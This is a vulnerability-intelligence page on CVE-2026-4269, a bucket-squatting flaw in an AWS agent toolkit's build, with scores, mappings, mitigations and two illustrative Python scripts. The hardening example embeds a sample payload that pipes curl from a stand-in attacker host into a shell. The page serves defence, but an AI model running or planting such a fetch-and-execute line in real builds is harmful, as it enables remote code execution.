Cyber Resilience

CVE-2026-4269

Severity: Medium
Published: 16 March 2026
Modified: 11 May 2026
KEV Added: not listed
Patch: available (upgrade to v0.1.13)
CVSS v4.0 score: 5.8 (Medium), vector CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H (Threat, Environmental and Supplemental metrics not defined)
EPSS score: 0.0007 (21.2nd percentile)
Risk Priority: 12 (weighted 60% EPSS, 20% KEV, 20% CVSS)

Summary

CVE-2026-4269 is a medium-severity Unverified Ownership (CWE-283) vulnerability in the Amazon Bedrock AgentCore Starter Toolkit. Its CVSS v4.0 base score is 5.8 (Medium). The CVSS v3.1 score quoted further down is 7.5 (High); the gap is a scoring-model difference, not a disagreement about impact: the v4.0 vector records no impact on the vulnerable toolkit itself (VC:N/VI:N/VA:N) and places the high confidentiality, integrity and availability impact on the subsequent system, the AgentCore Runtime (SC:H/SI:H/SA:H).

Operationally, this page maps exploitation to the MITRE ATT&CK technique Exploitation for Client Execution (T1203). EPSS ranks the vulnerability at the 21.2nd percentile by exploit likelihood (below the median), and it is not currently listed in the CISA KEV catalog.

The strongest mitigations our analysis identified are NIST 800-53 SI-2 (Flaw Remediation) and SI-7 (Software, Firmware, and Information Integrity).

Deeper analysis

CVE-2026-4269 stems from a missing S3 ownership verification in the Bedrock AgentCore Starter Toolkit prior to version v0.1.13. The flaw affects only users who built a pre-v0.1.13 toolkit after September 24, 2025; users on v0.1.13 or later, and users who built an earlier version before that date, are unaffected. The missing check allows code injection during the build process, which results in arbitrary code execution within the AgentCore Runtime. The issue is classified under CWE-283 (Unverified Ownership) and CWE-340 (Generation of Predictable Numbers or Identifiers).

Per the CVSS v3.1 vector (7.5, AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H), the attacker acts over the network and needs no privileges, but attack complexity is high and a user action (running the build) is required. The CWE pairing given here, unverified ownership (CWE-283) together with a predictable identifier (CWE-340), is the general S3 bucket-squatting pattern: a build that derives a bucket name predictably and then reads from that bucket without checking which AWS account owns it will accept whatever content an attacker who has created a bucket of that name chooses to serve. The advisory does not publish the toolkit's bucket naming or the exact build step, so read this as the class of flaw the CWEs describe rather than a confirmed exploit path. Whatever the precise step, content injected into the build runs with the build's authority and is carried into the AgentCore Runtime, which is the high confidentiality, integrity and availability impact both vectors record.
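The check that CWE-283 asks for, shown as an added example that is not code from the Bedrock AgentCore Starter Toolkit or from AWS; the toolkit's actual S3 call and bucket are not on this page and are not assumed here. The example uses the S3 request parameter ExpectedBucketOwner (a real S3 API parameter: S3 refuses the request with 403 AccessDenied when the bucket belongs to a different account) and adds a pinned SHA-256 as the integrity control. FakeS3 is a constructed stand-in for a boto3 client so the script runs offline; the bucket name, account ids and payloads are made up.

```python
"""Ownership and integrity checks on an S3 object consumed by a build step.

Added example, not the toolkit's code. FakeS3 models only the
ExpectedBucketOwner semantics of S3; everything else is constructed.
"""
import hashlib


class S3AccessDenied(Exception):
    """Stand-in for botocore's ClientError with Error.Code == 'AccessDenied'."""


class FakeS3:
    """Constructed model of S3: each bucket has one owning account id
    and a dict of key -> bytes."""

    def __init__(self, buckets):
        self._buckets = buckets

    def get_object(self, Bucket, Key, ExpectedBucketOwner=None):
        bucket = self._buckets[Bucket]
        # Real S3 behaviour: a mismatched ExpectedBucketOwner is a 403.
        if ExpectedBucketOwner is not None and bucket["owner"] != ExpectedBucketOwner:
            raise S3AccessDenied("AccessDenied")
        return {"Body": bucket["objects"][Key]}


def fetch_unverified(client, bucket, key):
    """Vulnerable pattern (CWE-283): the bucket name alone decides what the
    build trusts, so whoever owns a bucket of that name controls the input."""
    return client.get_object(Bucket=bucket, Key=key)["Body"]


def fetch_verified(client, bucket, key, expected_owner, pinned_sha256=None):
    """Hardened pattern: S3 refuses the read unless expected_owner owns the
    bucket, and the caller may also pin the content digest (the SI-7 style
    integrity check) so an altered object in a legitimate bucket is rejected."""
    response = client.get_object(Bucket=bucket, Key=key, ExpectedBucketOwner=expected_owner)
    body = response["Body"]
    if pinned_sha256 is not None:
        digest = hashlib.sha256(body).hexdigest()
        if digest != pinned_sha256:
            raise ValueError(f"integrity check failed for {bucket}/{key}: {digest}")
    return body


# Constructed scenario (hypothetical names). The build derives the bucket name
# from the account id, a predictable identifier (CWE-340). In the squatted
# world the same name is owned by another account serving hostile content.
TRUSTED_ACCOUNT = "123456789012"
BUCKET = f"build-artifacts-{TRUSTED_ACCOUNT}"
KEY = "bootstrap.py"
TRUSTED_BODY = b'print("legitimate bootstrap")\n'
HOSTILE_BODY = b'import os; os.system("curl https://attacker.invalid/x | sh")\n'
TRUSTED_SHA256 = hashlib.sha256(TRUSTED_BODY).hexdigest()

LEGIT_S3 = FakeS3({BUCKET: {"owner": TRUSTED_ACCOUNT, "objects": {KEY: TRUSTED_BODY}}})
SQUATTED_S3 = FakeS3({BUCKET: {"owner": "999999999999", "objects": {KEY: HOSTILE_BODY}}})
TAMPERED_S3 = FakeS3({BUCKET: {"owner": TRUSTED_ACCOUNT, "objects": {KEY: HOSTILE_BODY}}})


def run_scenarios():
    """Return, per scenario, whether the build would have accepted the object."""
    results = {}
    # 1. No ownership check against a squatted bucket: hostile code accepted.
    results["unverified_squatted"] = fetch_unverified(SQUATTED_S3, BUCKET, KEY) == HOSTILE_BODY
    # 2. Ownership check against a squatted bucket: S3 denies the read.
    try:
        fetch_verified(SQUATTED_S3, BUCKET, KEY, TRUSTED_ACCOUNT)
        results["verified_squatted"] = True
    except S3AccessDenied:
        results["verified_squatted"] = False
    # 3. Ownership plus pinned digest against the legitimate bucket: accepted.
    results["verified_legit"] = (
        fetch_verified(LEGIT_S3, BUCKET, KEY, TRUSTED_ACCOUNT, TRUSTED_SHA256) == TRUSTED_BODY
    )
    # 4. Right owner, altered object: ownership passes, the digest pin catches it.
    try:
        fetch_verified(TAMPERED_S3, BUCKET, KEY, TRUSTED_ACCOUNT, TRUSTED_SHA256)
        results["verified_tampered"] = True
    except ValueError:
        results["verified_tampered"] = False
    return results


if __name__ == "__main__":
    for name, accepted in run_scenarios().items():
        print(f"{name:20s} {'ACCEPTED' if accepted else 'rejected'}")
```

With a real boto3 client the call is the same `get_object(Bucket=..., Key=..., ExpectedBucketOwner=...)`; a mismatch surfaces as a botocore ClientError whose error code is AccessDenied. The ownership check alone does not defend against a compromised but correctly owned bucket, which is why the digest pin is kept as a second, independent control.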

AWS advisories recommend upgrading to Bedrock AgentCore Starter Toolkit v0.1.13 as the sole remediation. Details are available in the AWS security bulletin at https://aws.amazon.com/security/security-bulletins/2026-008-AWS/ and the GitHub release notes at https://github.com/aws/bedrock-agentcore-starter-toolkit/releases/tag/v0.1.13.


Vulnerability details

A missing S3 ownership verification in the Bedrock AgentCore Starter Toolkit before version v0.1.13 may allow a remote actor to inject code during the build process, leading to code execution in the AgentCore Runtime. This issue only affects users of the Bedrock AgentCore Starter Toolkit before version v0.1.13 who build or have built the Toolkit after September 24, 2025. Any users on a version >=v0.1.13, and any users on previous versions who built the toolkit before September 24, 2025 are not affected. To remediate this issue, customers should upgrade to version v0.1.13.
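The advisory's affected set has two conditions and one easy-to-miss boundary: v0.1.13 itself is the fixed release, so the version test is a strict "before 0.1.13", not "up to and including". The following triage helper, an added example that is not part of the advisory, encodes both conditions over a constructed inventory; the host names, versions and build dates are made up.

```python
"""Affected-version triage for CVE-2026-4269 (added example, not AWS code).

Affected iff: toolkit version < v0.1.13 AND the toolkit was built after
24 September 2025. Inventory rows below are constructed.
"""
import re
from datetime import date

FIXED_VERSION = (0, 1, 13)
CUTOFF_DATE = date(2025, 9, 24)
_VERSION_RE = re.compile(r"^v?(\d+)\.(\d+)\.(\d+)$")


def parse_version(text):
    """Accept 'X.Y.Z' with an optional leading 'v'. Anything else (pre-release
    or local tags, missing components) raises so the operator reviews it by
    hand rather than the tool silently guessing."""
    match = _VERSION_RE.match(text.strip())
    if not match:
        raise ValueError(f"unrecognised version string: {text!r}")
    return tuple(int(part) for part in match.groups())


def is_affected(version, built_on):
    """True when both advisory conditions hold. The advisory says 'after
    September 24, 2025' and 'before September 24, 2025' without covering the
    day itself; a build dated exactly on the cutoff is treated as affected,
    the conservative choice for triage (an assumption of this example)."""
    return parse_version(version) < FIXED_VERSION and built_on >= CUTOFF_DATE


def triage(inventory):
    """inventory: iterable of (host, version, built_on) tuples.
    Returns the hosts that need the upgrade to v0.1.13."""
    return [host for host, version, built_on in inventory if is_affected(version, built_on)]


# Constructed inventory.
INVENTORY = [
    ("dev-box-1", "v0.1.12", date(2025, 11, 3)),  # old version, built after cutoff: affected
    ("dev-box-2", "0.1.13", date(2025, 11, 3)),   # fixed version: not affected
    ("ci-runner", "0.1.9", date(2025, 8, 15)),    # old version, built before cutoff: not affected
    ("laptop", "0.1.12", date(2025, 9, 24)),      # on the cutoff day: treated as affected
    ("staging", "v0.2.0", date(2026, 2, 1)),      # newer than the fix: not affected
]

if __name__ == "__main__":
    print("needs upgrade to v0.1.13:", triage(INVENTORY))
```

The build date matters because an old version built before the cutoff is explicitly out of scope; an inventory that records only the installed version will over-report, which is acceptable, but one that records only "version >= 0.1.13" as the test will miss nothing and is the simpler rule if build dates are unavailable.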

CWE(s)

CWE-283 Unverified Ownership
CWE-340 Generation of Predictable Numbers or Identifiers

Related Threats

MITRE ATT&CK Enterprise Techniques (AI-assisted mapping)

T1203 Exploitation for Client Execution (tactic: Execution)
Adversaries may exploit software vulnerabilities in client applications to execute code.
T1059 Command and Scripting Interpreter (tactic: Execution)
Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries.
Why these techniques?

Missing S3 ownership verification enables code injection into the build process of a client-side toolkit, which the mapping treats as exploitation for client execution (T1203) leading to arbitrary command or script execution (T1059) within the runtime. One caveat for defenders: T1203 describes exploitation of a client application on the victim endpoint, whereas here the injected code ends up executing in the AgentCore Runtime after the build is deployed. Code inserted into a development tool's build and carried into production is also the pattern ATT&CK covers under Supply Chain Compromise (T1195), so detections and threat models keyed only to T1203 would miss the deployment side of this issue.

Confidence: HIGH · MITRE ATT&CK Enterprise v18.1

CVEs Like This One

CVE-2026-5707 (same vendor: Amazon)
CVE-2026-5747 (same vendor: Amazon)
CVE-2026-5709 (same vendor: Amazon)
CVE-2026-7461 (same vendor: Amazon)
CVE-2026-3338 (same vendor: Amazon)
CVE-2026-7426 (same vendor: Amazon)
CVE-2025-23206 (same vendor: Amazon)
CVE-2026-7424 (same vendor: Amazon)
CVE-2026-3336 (same vendor: Amazon)
CVE-2026-5708 (same vendor: Amazon)

Affected Assets

Vendor: Amazon
Product: Bedrock AgentCore Starter Toolkit
Versions: < 0.1.13 (v0.1.13 is the fixed release; only builds of an earlier version performed after 24 September 2025 are affected)

Mitigating Controls

Mitigating Controls (NIST 800-53 r5, AI-assisted mapping)

Prevent (control identifier not given on this page): verifies authenticity and ownership of S3 objects pulled during the Bedrock AgentCore Starter Toolkit build process, directly preventing code injection from unverified sources.

Prevent, SI-7 (Software, Firmware, and Information Integrity): enforces integrity verification of software and components in the AgentCore Runtime, blocking execution of code injected via the unverified S3 flaw.

Prevent, SI-2 (Flaw Remediation): requires timely flaw remediation by upgrading to Bedrock AgentCore Starter Toolkit v0.1.13, eliminating the missing S3 ownership verification.

References

AWS security bulletin: https://aws.amazon.com/security/security-bulletins/2026-008-AWS/
GitHub release notes for v0.1.13: https://github.com/aws/bedrock-agentcore-starter-toolkit/releases/tag/v0.1.13